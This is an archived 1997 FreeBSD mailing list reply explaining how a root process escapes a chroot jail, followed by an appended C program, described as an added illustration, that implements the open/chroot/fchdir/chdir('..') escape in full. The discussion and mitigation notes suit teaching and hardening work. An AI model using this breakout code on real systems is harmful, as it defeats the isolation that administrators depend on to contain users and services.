From owner-freebsd-hackers Wed May 28 21:58:07 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA24518 for hackers-outgoing; Wed, 28 May 1997 21:58:07 -0700 (PDT)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id VAA24508 for ; Wed, 28 May 1997 21:58:03 -0700 (PDT)
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wWxHX-0002Fs-00; Wed, 28 May 1997 22:57:47 -0600
To: "David E. Cross"
Subject: Re: Correct way to chroot for shell account users?
Cc: Peter Korsten , Jaye Mathisen , hackers@freebsd.org
In-reply-to: Your message of "Thu, 29 May 1997 00:41:43 EDT."
References:
Date: Wed, 28 May 1997 22:57:47 -0600
From: Warner Losh
Message-Id:
Sender: owner-hackers@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message "David E. Cross" writes:
: Could someone give me some simple details of how to break out of a chroot
: 'jail' (without relying on kernfs or raw devices), I have heard of this
: before, but no one has given me a theory or code of how to do it.

Basically, and this has been posted in many places, you get a handle on
something outside the jail. You do this by basically opening '/', mkdir xxx,
chroot xxx, then fchdir to the old '/' and then chdir '..'.

There are things that can be done in the kernel, but they are either very
expensive or very hard to get right (and not break anything) or both. A
simple fix is to disallow a chroot when someone has already been chroot'd.
This breaks symmetry, but doesn't completely solve the problem because there
are many other ways out (that aren't on the top of my head).

Hmmm, writing this up, I realized what the ln way was. If you are in a
chroot jail, you mkdir xxx; ln xxx/yyy /; chroot xxx; cd yyy; cd .. ; ...
and you are out. However, the ln step is no longer allowed since it is hard
linking directories together, which is bad for other reasons.

Warner
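The open('/') / mkdir / chroot / fchdir / chdir('..') sequence Warner describes, written out as an added C illustration. This is not code from the original mail or from FreeBSD; only the directory name "xxx" comes from the message, and the helper names (climb_to_root, climb_from, cwd_is_root, escape_chroot) are assumptions made here. It relies on chroot(2) being privileged (so it must run as root inside the jail) and on the kernel leaving the working directory alone when the root directory changes, which is exactly the behaviour that makes fchdir to the old root a way out. The "disallow a second chroot" mitigation Warner mentions would make the chroot("xxx") call fail and stop this particular route.

```c
/*
 * Added illustration of the chroot escape described in the mail above.
 * Not from the original post or from FreeBSD; helper names are assumed.
 * Idea: keep a descriptor on the current root, chroot into a child so that
 * descriptor now points outside the new jail, fchdir back to it, and walk
 * ".." until ".." stops changing directories (the real root).
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 when the working directory is the filesystem root "/", else 0. */
int cwd_is_root(void)
{
    char buf[4096];
    if (getcwd(buf, sizeof buf) == NULL)
        return 0;
    return strcmp(buf, "/") == 0;
}

/* chdir("..") until the directory no longer changes (".." of "/" is "/").
 * Returns the number of levels climbed, or -1 on a syscall failure. */
int climb_to_root(void)
{
    struct stat before, after;
    int levels = 0;
    for (;;) {
        if (stat(".", &before) != 0 || chdir("..") != 0 ||
            stat(".", &after) != 0)
            return -1;
        if (before.st_dev == after.st_dev && before.st_ino == after.st_ino)
            return levels;
        levels++;
    }
}

/* Unprivileged helper: start at `start`, climb, report the levels climbed. */
int climb_from(const char *start)
{
    if (chdir(start) != 0)
        return -1;
    return climb_to_root();
}

/* The escape itself (needs root). Returns 0 when the process root is "/". */
int escape_chroot(void)
{
    /* 1. Handle on the current (jail) root. */
    int oldroot = open("/", O_RDONLY | O_DIRECTORY);
    if (oldroot < 0)
        return -1;
    /* 2. mkdir xxx; chroot xxx.  The old root is now outside the jail. */
    if (mkdir("xxx", 0700) != 0 && errno != EEXIST) { close(oldroot); return -1; }
    if (chroot("xxx") != 0) { close(oldroot); return -1; }
    /* 3. fchdir to the old root: cwd is now outside the new root directory. */
    if (fchdir(oldroot) != 0) { close(oldroot); return -1; }
    close(oldroot);
    /* 4. chdir '..' repeatedly; nothing pins us to the jail any more. */
    if (climb_to_root() < 0)
        return -1;
    /* 5. Make the real root our root directory again. */
    return chroot(".");
}

int main(void)
{
    if (escape_chroot() != 0) {
        perror("escape_chroot");
        return 1;
    }
    printf("process root is now %s\n", cwd_is_root() ? "/" : "(unknown)");
    return 0;
}
```

The climb helpers run unprivileged and can be checked on any machine; escape_chroot itself only does anything useful when invoked as root from inside a jail, and will simply fail with EPERM otherwise.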